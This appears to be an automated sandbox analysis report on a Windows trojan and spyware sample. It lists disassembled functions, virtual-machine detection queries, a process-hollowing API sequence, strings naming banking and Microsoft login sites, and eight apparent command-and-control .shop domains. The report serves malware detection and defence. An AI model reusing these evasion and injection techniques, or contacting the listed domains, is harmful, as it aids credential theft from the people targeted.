                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042C26C3_2_0042C26C
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042CA353_2_0042CA35
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042CAF13_2_0042CAF1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F2F63_2_0043F2F6
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004042803_2_00404280
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042C2823_2_0042C282
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043EA803_2_0043EA80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004263403_2_00426340
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042CB4C3_2_0042CB4C
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004263603_2_00426360
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041AB003_2_0041AB00
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004373003_2_00437300
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00427B083_2_00427B08
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00432B103_2_00432B10
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F3303_2_0043F330
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00404BC03_2_00404BC0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004073C03_2_004073C0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F3C03_2_0043F3C0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041C3CC3_2_0041C3CC
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004393D03_2_004393D0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00423BE03_2_00423BE0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040EB803_2_0040EB80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042238D3_2_0042238D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F4503_2_0043F450
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00439C703_2_00439C70
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042847D3_2_0042847D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00421C803_2_00421C80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041DC903_2_0041DC90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004274A53_2_004274A5
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00427CB03_2_00427CB0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004365543_2_00436554
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00432D703_2_00432D70
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040ED753_2_0040ED75
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043150E3_2_0043150E
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043C5103_2_0043C510
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041D5303_2_0041D530
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00414DC03_2_00414DC0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00437DE03_2_00437DE0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004065F03_2_004065F0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042FDF93_2_0042FDF9
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040AD903_2_0040AD90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00405DA03_2_00405DA0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00436DB23_2_00436DB2
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041FE7C3_2_0041FE7C
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043FE203_2_0043FE20
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00402ED03_2_00402ED0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040C6F03_2_0040C6F0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041DE903_2_0041DE90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004187403_2_00418740
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00428F6C3_2_00428F6C
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004147773_2_00414777
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004237D03_2_004237D0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00417FE13_2_00417FE1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041EFE03_2_0041EFE0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00416F8D3_2_00416F8D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042F7BC3_2_0042F7BC
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006E04123_2_006E0412
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006D34A03_2_006D34A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006CDE423_2_006CDE42
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006DE6FE3_2_006DE6FE
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006C973B3_2_006C973B
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: String function: 006D1D88 appears 42 times
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: String function: 006D637D appears 34 times
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: String function: 00407EE0 appears 45 times
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: String function: 00414110 appears 82 times
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: String function: 006C9C50 appears 94 times
                Source: UhsjR3ZFTD.exeStatic PE information: invalid certificate
                Source: UhsjR3ZFTD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: UhsjR3ZFTD.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003265987168874
                Source: UhsjR3ZFTD.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003265987168874
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00438860
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCommand line argument: ^Qm0_2_006D50B0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCommand line argument: ^Qm3_2_006D50B0
                Source: UhsjR3ZFTD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2136162300.0000000005477000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2147684210.0000000005466000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2136562092.0000000005459000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: UhsjR3ZFTD.exeReversingLabs: Detection: 31%
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeFile read: C:\Users\user\Desktop\UhsjR3ZFTD.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeProcess created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeProcess created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: UhsjR3ZFTD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: UhsjR3ZFTD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: UhsjR3ZFTD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: UhsjR3ZFTD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: UhsjR3ZFTD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: UhsjR3ZFTD.exeStatic PE information: section name: .CODE
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006C9E0A push ecx; ret 0_2_006C9E1D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h3_2_0043F005
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00445408 push ebp; ret 3_2_00445409
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0044866F pushfd ; retf 3_2_00448677
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006C9E0A push ecx; ret 3_2_006C9E1D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe TID: 6792Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe TID: 6792Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006DB358 FindFirstFileExW,0_2_006DB358
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006DB409
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006DB358 FindFirstFileExW,3_2_006DB358
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_006DB409
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2182020938.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2182020938.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147215994.000000000548C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: UhsjR3ZFTD.exe, 00000003.00000002.2227782653.0000000002E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(T
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043D910 LdrInitializeThunk,3_2_0043D910
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006D1AC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006D1AC0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006F019E mov edi, dword ptr fs:[00000030h]0_2_006F019E
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006C1BA0 mov edi, dword ptr fs:[00000030h]0_2_006C1BA0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006C1BA0 mov edi, dword ptr fs:[00000030h]3_2_006C1BA0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006D6C90 GetProcessHeap,0_2_006D6C90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006C9AC7 SetUnhandledExceptionFilter,0_2_006C9AC7
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006D1AC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006D1AC0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006C9AD3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006C9AD3
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006C9713 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006C9713
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006C9AC7 SetUnhandledExceptionFilter,3_2_006C9AC7
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006D1AC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006D1AC0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006C9AD3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006C9AD3
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006C9713 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_006C9713

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006F019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_006F019E
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeMemory written: C:\Users\user\Desktop\UhsjR3ZFTD.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: UhsjR3ZFTD.exe, 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
